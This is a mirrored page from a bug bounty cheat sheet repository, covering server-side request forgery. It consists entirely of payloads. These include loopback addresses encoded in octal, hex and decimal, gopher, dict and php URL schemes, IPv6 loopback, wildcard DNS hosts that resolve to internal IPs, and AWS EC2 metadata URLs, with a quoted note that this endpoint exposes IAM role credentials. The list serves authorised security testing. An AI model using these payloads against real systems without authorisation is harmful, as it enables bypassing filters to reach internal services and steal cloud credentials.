mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-22 11:03:14 +00:00
73 lines
1.1 KiB
Markdown
73 lines
1.1 KiB
Markdown
## SSRF
|
|
|
|
```
|
|
http://0177.1/
|
|
```
|
|
|
|
```
|
|
http://0x7f.1/
|
|
```
|
|
|
|
```
|
|
http://127.000.000.1
|
|
```
|
|
|
|
```
|
|
https://520968996
|
|
```
|
|
|
|
_Note:_ The latter can be calculated using http://www.subnetmask.info/
|
|
|
|
**Exotic Handlers**
|
|
|
|
```
|
|
gopher://, dict://, php://, jar://, tftp://
|
|
```
|
|
|
|
**IPv6**
|
|
|
|
```
|
|
http://[::1]
|
|
```
|
|
|
|
```
|
|
http://[::]
|
|
```
|
|
|
|
**Wildcard DNS**
|
|
|
|
```
|
|
10.0.0.1.xip.io
|
|
www.10.0.0.1.xip.io
|
|
mysite.10.0.0.1.xip.io
|
|
foo.bar.10.0.0.1.xip.io
|
|
```
|
|
_Link:_ http://xip.io
|
|
|
|
```
|
|
10.0.0.1.nip.io
|
|
app.10.0.0.1.nip.io
|
|
customer1.app.10.0.0.1.nip.io
|
|
customer2.app.10.0.0.1.nip.io
|
|
otherapp.10.0.0.1.nip.io
|
|
```
|
|
|
|
_Link:_ http://nip.io
|
|
|
|
**AWS EC2 Metadata**
|
|
|
|
```
|
|
http://169.254.169.254/latest/meta-data/
|
|
```
|
|
|
|
```
|
|
http://169.254.169.254/latest/meta-data/local-hostname
|
|
```
|
|
|
|
```
|
|
http://169.254.169.254/latest/meta-data/public-hostname
|
|
```
|
|
|
|
> If there is an IAM role associated with the instance, role-name is the name of the role, and role-name contains the temporary security credentials associated with the role [...]
|
|
|
|
_Link:_ http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html (includes a comprehensive Instance Metadata Categories table)
|